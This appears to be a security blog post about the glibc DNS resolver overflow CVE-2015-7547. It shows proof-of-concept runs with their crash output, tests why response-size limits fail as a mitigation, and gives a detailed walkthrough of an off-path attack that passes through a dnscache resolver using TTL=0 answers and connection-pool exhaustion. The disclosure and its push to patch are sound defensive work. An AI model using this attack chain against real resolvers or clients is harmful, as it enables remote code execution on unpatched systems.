This post was written by Marek Vavruša and Jaime Cochran, who found out they were both independently working on the same glibc vulnerability attack vectors at 3am last Tuesday.
A buffer overflow error in GNU libc DNS stub resolver code was announced last week as CVE-2015-7547. While it doesn't have any nickname yet (last year's Ghost was more catchy), it is potentially disastrous as it affects any platform with recent GNU libc—CPEs, load balancers, servers and personal computers alike. The big question is: how exploitable is it in the real world?
It turns out that the only mitigation that works is patching. Please patch your systems now, then come back and read this blog post to understand why attempting to mitigate this attack by limiting DNS response sizes does not work.
But first, patch!
Let's start with the PoC from Google, which uses the first attack vector described in the vulnerability announcement. First, a 2048-byte UDP response forces buffer allocation, then a failure response forces a retry, and finally the last two answers smash the stack.
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo python poc.py &
$ valgrind curl http://foo.bar.google.com
==17897== Invalid read of size 1
==17897==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==17897==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==17897==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==17897==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==17897==    by 0x4242424242424241: ???
==17897==  Address 0x4242424242424245 is not stack'd, malloc'd or (recently) free'd
Segmentation fault
This proof of concept requires the attacker to talk to the glibc stub resolver code either directly or through a simple forwarder. This situation arises when your DNS traffic is intercepted or when you're using an untrusted network.
One of the suggested mitigations in the announcement was to limit UDP response size to 2048 bytes, 1024 in case of TCP. Limiting UDP is, with all due respect, completely ineffective and only forces legitimate queries to retry over TCP. Limiting TCP answers is a plain protocol violation that cripples legitimate answers:
$ dig @b.gtld-servers.net +tcp +dnssec NS root-servers.net | grep "MSG SIZE"
;; MSG SIZE rcvd: 1254
Regardless, let's see if response size clipping is effective at all. When calculating size limits, we have to take the IPv4 header into account (20 octets), and also the UDP header overhead (8 octets), leading to a maximum allowed datagram size of 2076 octets. DNS/TCP may arrive fragmented, so for the sake of argument, let's drop DNS/TCP altogether.
$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP
$ sudo iptables -I INPUT -p tcp --sport 53 -j DROP
$ valgrind curl http://foo.bar.google.com
curl: (6) Could not resolve host: foo.bar.google.com
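The 2077 lower bound in the length match follows directly from the header arithmetic described above. As a small sketch (the constant and function names are made up for illustration, and the 20-octet figure assumes an IPv4 header without options):

```python
IPV4_HEADER_OCTETS = 20        # minimum IPv4 header, assuming no IP options
UDP_HEADER_OCTETS = 8          # fixed UDP header size
DNS_PAYLOAD_LIMIT_OCTETS = 2048  # the response size limit under discussion


def max_datagram_octets(dns_payload=DNS_PAYLOAD_LIMIT_OCTETS):
    """Largest IP datagram that still carries a DNS payload within the limit."""
    return IPV4_HEADER_OCTETS + UDP_HEADER_OCTETS + dns_payload


def drop_length_range(dns_payload=DNS_PAYLOAD_LIMIT_OCTETS):
    """Length range to drop: everything above the allowed maximum."""
    return "{}:65535".format(max_datagram_octets(dns_payload) + 1)


print(max_datagram_octets())
print(drop_length_range())
```

The second value is the range passed to `--length` in the rule above.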
Looks like we've mitigated the first attack method, albeit with collateral damage. But what about the UDP-only proof of concept?
$ echo "nameserver 127.0.0.10" | sudo tee /etc/resolv.conf
$ sudo python poc-udponly.py &
$ valgrind curl http://foo.bar.google.com
==18293== Syscall param socketcall.recvfrom(buf) points to unaddressable byte(s)
==18293==    at 0x4F1E8C3: __recvfrom_nocancel (syscall-template.S:81)
==18293==    by 0x59FBFD0: send_dg (res_send.c:1259)
==18293==    by 0x59FBFD0: __libc_res_nsend (res_send.c:557)
==18293==    by 0x59F9C0B: __libc_res_nquery (res_query.c:227)
==18293==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18293==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18293==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18293==    by 0x4F08AA0: gaih_inet (getaddrinfo.c:862)
==18293==    by 0x4F0AC4C: getaddrinfo (getaddrinfo.c:2418)
==18293==  Address 0xfff001000 is not stack'd, malloc'd or (recently) free'd
*** Error in `curl': double free or corruption (out): 0x00007fe7331b2e00 ***
Aborted
While it's not possible to ship a whole attack payload in a 2048-byte UDP response, it still leads to memory corruption. When the announcement suggested blocking DNS UDP responses larger than 2048 bytes as a viable mitigation, it confused a lot of people, including other DNS vendors and ourselves. This and the following proof of concept show that it's not only futile, but harmful in the long term if these rules are left enabled.
So far, the presented attacks required a MitM scenario, where the attacker talks to a glibc resolver directly. A "good enough" mitigation is to run a local caching resolver to isolate glibc code from the attacker. In fact, doing so not only improves Internet performance with a local cache, but also shields you from past and possibly future security vulnerabilities.
Is a caching stub resolver really good enough?
Unfortunately, no. A local stub resolver such as dnsmasq alone is not sufficient to defuse this attack. It's easy to traverse, as it doesn't scrub upstream answers—let's see if the attack goes through with a modified proof of concept that uses only well-formed answers and zero time-to-live (TTL) for cache traversal.
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo dnsmasq -d -a 127.0.0.1 -R -S 127.0.0.10 -z &
$ sudo python poc-dnsmasq.py &
$ valgrind curl http://foo.bar.google.com
==20866== Invalid read of size 1
==20866==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==20866==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==20866==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==20866==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==20866==    by 0x1C000CC04D4D4D4C: ???
Killed
The big question is—now that we've seen that the mitigation strategies for MitM attacks are provably ineffective, can we exploit the flaw off-path through a caching DNS resolver?
An off-path attack scenario
Let's start with the first phase of the attack. A compliant resolver is never going to give out a response larger than 512 bytes over UDP to a client that doesn't support EDNS0. Since the glibc resolver doesn't enable EDNS0 by default, we have to escalate to TCP and perform the whole attack there. Also, the client should have at least two nameservers configured; otherwise a successful attack becomes more complicated.
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo iptables -F INPUT
$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP
Let's try it with a proof of concept that merges both the DNS proxy and the attacker.
The DNS proxy on localhost is going to ask the attacker both queries over UDP, and the attacker responds with the TC flag set to force the client to retry over TCP.
The attacker responds once with a TCP response of 2049 bytes or longer, then forces the proxy to close the TCP connection to the glibc resolver code. This is the critical step, and there is no reliable way to achieve it.
The attacker sends back a full attack payload, which the proxy happily forwards to the glibc resolver client.
$ sudo python poc-tcponly.py &
$ valgrind curl http://foo.bar.google.com
==18497== Invalid read of size 1
==18497==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==18497==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18497==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18497==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18497==    by 0x1C000CC04D4D4D4C: ???
==18497==  Address 0x1000000000000103 is not stack'd, malloc'd or (recently) free'd
Killed
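The first step of that sequence hinges on the TC (truncated) bit in the DNS header. The following is a minimal sketch of how such a reply could be built, not the code from the PoC: it echoes the query's ID and question section and sets QR and TC. The helper names `build_query` and `truncated_reply` are made up for illustration.

```python
import struct

# Flag bits in the second 16-bit word of the DNS header (RFC 1035, section 4.1.1).
QR_RESPONSE = 0x8000   # message is a response
TC_TRUNCATED = 0x0200  # message was truncated; the client should retry over TCP
RD_DESIRED = 0x0100    # recursion desired, copied from the query

TYPE_AAAA = 28
CLASS_IN = 1
HEADER = struct.Struct("!HHHHHH")  # id, flags, qdcount, ancount, nscount, arcount


def build_query(query_id, name, qtype):
    """Build a one-question query (hypothetical helper, only used to feed the demo)."""
    labels = name.rstrip(".").encode("ascii").split(b".")
    qname = b"".join(bytes([len(label)]) + label for label in labels) + b"\x00"
    header = HEADER.pack(query_id, RD_DESIRED, 1, 0, 0, 0)
    return header + qname + struct.pack("!HH", qtype, CLASS_IN)


def truncated_reply(query):
    """Echo the ID and question section with QR and TC set and no records."""
    query_id, flags, qdcount, _an, _ns, _ar = HEADER.unpack(query[:HEADER.size])
    reply_flags = QR_RESPONSE | TC_TRUNCATED | (flags & RD_DESIRED)
    return HEADER.pack(query_id, reply_flags, qdcount, 0, 0, 0) + query[HEADER.size:]


query = build_query(0x1234, "foo.bar.google.com", TYPE_AAAA)
reply = truncated_reply(query)
print(reply.hex())
```

A stub resolver that receives a reply like this over UDP is expected to repeat the same question over TCP, which is where the rest of the attack takes place.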
Performing the attack over a real resolver
The key to a real-world, non-MitM attack through a caching resolver is to control the messages between the resolver and the client indirectly. We came to the conclusion that djbdns' dnscache was the best target for attempting to illustrate an actual cache traversal.
In order to fend off DoS attack vectors like slowloris, which makes numerous simultaneous TCP connections and holds them open to clog up a service, DNS resolvers have a finite pool of parallel TCP connections. This is usually achieved by limiting these parallel TCP connections and closing the oldest or least-recently active one. For example—djbdns (dnscache) holds up to 20 parallel TCP connections, then starts dropping them, starting from the oldest one. Knowing this, we realised that we were able to terminate TCP connections with ease. Thus, one security fix becomes another bug’s treasure.
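The eviction behaviour described above can be modelled in a few lines. This is a toy model under stated assumptions, not dnscache's actual code: the class name `OldestFirstPool` is hypothetical, and it only captures the "at most 20 connections, drop the oldest" rule.

```python
from collections import OrderedDict


class OldestFirstPool:
    """Toy model of a TCP connection pool that evicts the oldest connection."""

    def __init__(self, limit=20):
        self.limit = limit
        self._conns = OrderedDict()  # insertion order doubles as connection age

    def accept(self, conn_id):
        """Register a new connection and return the IDs evicted to make room."""
        self._conns[conn_id] = True
        evicted = []
        while len(self._conns) > self.limit:
            oldest, _ = self._conns.popitem(last=False)
            evicted.append(oldest)
        return evicted

    def is_open(self, conn_id):
        return conn_id in self._conns


pool = OldestFirstPool(limit=20)
pool.accept("glibc-client")  # the connection we want the resolver to close

closed = []
for i in range(20):          # filler connections opened by a third party
    closed += pool.accept("filler-{}".format(i))

print(closed, pool.is_open("glibc-client"))
```

In this model, anyone who can open enough connections decides when an older connection gets closed, without ever touching that connection directly.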
In order to exploit this, the attacker can send a truncated UDP A+AAAA query, which triggers the necessary retry over TCP. The attacker responds with a valid answer with a TTL of 0 and dnscache sends the glibc client a truncated UDP response. At this point, the glibc function send_vc() retries with dnscache over TCP and, since the previous answer's TTL was 0, dnscache asks the attacker's server for the A+AAAA query again. The attacker responds to the A query with an answer larger than 2000 bytes to induce glibc's buffer mismanagement, and dnscache then forwards it to the client. Now the attacker can either wait out the AAAA query while other clients are making perfectly legitimate requests, or instead make 20 TCP connections back to dnscache until dnscache terminates the attacker's connection.
Now that we've met all the conditions to trigger another retry, the attacker sends back any valid A response and a valid, oversized AAAA that carries the payload (either in CNAME or AAAA RDATA). dnscache tosses this back to the client, triggering the overflow.
It seems like a complicated process, but it really is not. Let’s have a look at our proof-of-concept:
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo python poc-dnscache.py
[TCP] Sending back first big answer with TTL=0
[TCP] Sending back second big answer with TTL=0
[TCP] Preparing the attack with an answer >2k
[TCP] Connecting back to caller to force it close original connection('127.0.0.1', 53)
[TCP] Original connection was terminated, expecting to see requery...
[TCP] Sending back a valid answer in A
[TCP] Sending back attack payload in AAAA
$ valgrind curl https://www.cloudflare.com/
==6025== Process terminating with default action of signal 11 (SIGSEGV)
==6025==  General Protection Fault
==6025==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==6025==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==6025==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==6025==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==6025==    by 0x1C000CC04D4D4D4C: ???
Killed
This PoC was made simply to illustrate that remote code execution via DNS resolver cache traversal is not only possible, but may already be happening. So, patch. Now.
We reached out to OpenDNS, knowing they had used djbdns as part of their codebase. They investigated and verified this particular attack does not affect their resolvers.
How accidental defenses saved the day
Dan Kaminsky wrote a thoughtful blog post about scoping this issue. He argues:
I’m just going to state outright: Nobody has gotten this glibc flaw to work
through caches yet. So we just don’t know if that’s possible. Actual
exploit chains are subject to what I call the MacGyver effect.
Current resolvers scrub and sanitize final answers, so the attack payload must be encoded in a well-formed DNS answer to survive a pass through the resolver. In addition, only some record types are safely left intact: as the attack payload is carried in the answer to the AAAA query, only AAAA records in the answer section are safe from being scrubbed, which forces the attacker to encode the payload in these. One way to circumvent this limitation is to use a CNAME record, where the attack payload may be encoded in the CNAME target (maximum of 255 octets).
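To get a feel for how tight the CNAME constraint is, here is a minimal sketch of DNS name wire encoding with the standard limits (63 octets per label, 255 octets per name including length bytes and the root label). The function names are made up for illustration, and the sketch says nothing about whether a given resolver passes arbitrary label bytes through unchanged.

```python
MAX_LABEL_OCTETS = 63   # per-label limit from RFC 1035
MAX_NAME_OCTETS = 255   # whole-name limit, including length bytes and the root label


def split_into_labels(payload):
    """Cut raw bytes into chunks that each fit in a single label."""
    return [payload[i:i + MAX_LABEL_OCTETS]
            for i in range(0, len(payload), MAX_LABEL_OCTETS)]


def encode_name(labels):
    """Encode labels in DNS wire format, enforcing both size limits."""
    wire = b""
    for label in labels:
        if not 0 < len(label) <= MAX_LABEL_OCTETS:
            raise ValueError("label must be 1..63 octets")
        wire += bytes([len(label)]) + label
    wire += b"\x00"  # root label terminates the name
    if len(wire) > MAX_NAME_OCTETS:
        raise ValueError("encoded name exceeds 255 octets")
    return wire


# Three full labels plus one 61-octet label exactly fill the 255-octet budget.
target = encode_name(split_into_labels(b"M" * 250))
print(len(target))
```

Under these limits a single CNAME target carries at most 250 octets of raw data, since every label costs one extra length byte and the name ends with a root byte.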
The only good mitigation is to run a DNS resolver on localhost where the attacker can't introduce resource exhaustion, or at least to enforce a minimum cache TTL to defuse the waiting game attack.
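To see why a minimum cache TTL helps, consider a toy model of a resolver cache. This is a sketch under stated assumptions: `TinyCache` and its `min_ttl` parameter are hypothetical, and real resolvers expose this setting under different names, if at all.

```python
class TinyCache:
    """Toy answer cache keyed by query name; time is passed in explicitly."""

    def __init__(self, min_ttl=0):
        self.min_ttl = min_ttl
        self._entries = {}  # name -> (answer, expiry time in seconds)

    def store(self, name, answer, ttl, now):
        # Clamp the upstream TTL so TTL=0 answers still live for min_ttl seconds.
        effective_ttl = max(ttl, self.min_ttl)
        self._entries[name] = (answer, now + effective_ttl)

    def lookup(self, name, now):
        entry = self._entries.get(name)
        if entry is None or now >= entry[1]:
            return None  # miss: the resolver would have to ask upstream again
        return entry[0]


name = "foo.bar.google.com"

unclamped = TinyCache(min_ttl=0)
unclamped.store(name, "first answer", ttl=0, now=100)

clamped = TinyCache(min_ttl=5)
clamped.store(name, "first answer", ttl=0, now=100)

print(unclamped.lookup(name, now=100))
print(clamped.lookup(name, now=101))
```

Without the clamp, a TTL of 0 means the retried query goes straight back upstream, so the attacker gets to answer the same question twice with different content. With the clamp, the retry is served the answer that was already cached.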
You might think it's unlikely that you could become a MitM target, but the fact is that you already are. If you have ever used public Wi-Fi in an airport, hotel or café, you may have noticed being redirected to a captive portal for authentication purposes. This is a temporary DNS hijacking that redirects you to an internal portal until you agree to the terms and conditions. What's even worse is a permanent DNS interception that you don't notice until you look at the actual answers. This happens on a daily basis and takes only a single name lookup to trigger the flaw.
Neither DNSSEC nor independent public resolvers prevent it, as the attack happens between the stub and the recursor on the last mile. The recent flaws highlight the fragility of not only legacy glibc code, but also stubs in general. DNS is a deceptively complicated protocol and should be treated carefully. A generally good mitigation is to shield yourself with a local caching DNS resolver, or at least a DNSCrypt tunnel. Arguably, there might be a vulnerability in the resolver as well, but it is contained to the daemon itself, not to everything using the C library (e.g., sudo).
Are you affected?
If you're running GNU libc between 2.9 and 2.22 then yes. Below is an informative list of several major platforms affected.
| Platform | Advisory | Status |
|---|---|---|
| Debian | CVE-2015-7547 | Patched packages available (squeeze and newer) |
| Ubuntu | USN-2900-1 | Patched packages available (14.04 and newer) |
| RHEL | KB2161461 | Patched packages available (RHEL 6-7) |
| SUSE | SUSE-SU-2016:0472-1 | Patched packages available (latest) |
| Network devices & CPEs | Updated list of affected platforms | |
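As a rough first check against the version range given above, the sketch below compares a glibc version string with it. Treat the result as a hint only: it assumes the range is inclusive on both ends, and distributions typically ship the fix in patched packages without changing the upstream version number, so a version inside the range means "check your vendor's advisory", not "vulnerable". The function name `in_affected_range` is made up for illustration.

```python
import platform
import re

AFFECTED_MIN = (2, 9)    # first affected release, per the range quoted above
AFFECTED_MAX = (2, 22)   # last affected release (assumed inclusive)


def in_affected_range(version):
    """Return True if a glibc version string falls within the quoted range."""
    match = re.match(r"(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError("unrecognised version string: {!r}".format(version))
    major_minor = (int(match.group(1)), int(match.group(2)))
    return AFFECTED_MIN <= major_minor <= AFFECTED_MAX


if __name__ == "__main__":
    lib, version = platform.libc_ver()
    if lib != "glibc" or not version:
        print("This Python does not report glibc; the range check does not apply.")
    elif in_affected_range(version):
        print("glibc {} is in the affected range; check your vendor's advisory.".format(version))
    else:
        print("glibc {} is outside the affected range.".format(version))
```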
The toughest problem with this issue is the long tail of custom CPEs and IoT devices, which can't really be enumerated. Consult the manufacturer's website for vulnerability disclosures. Keep in mind that if your CPE is affected by remote code execution, its network can no longer be treated as safe.
If you're running OS X, iOS, Android or any BSD flavour, you're not affected.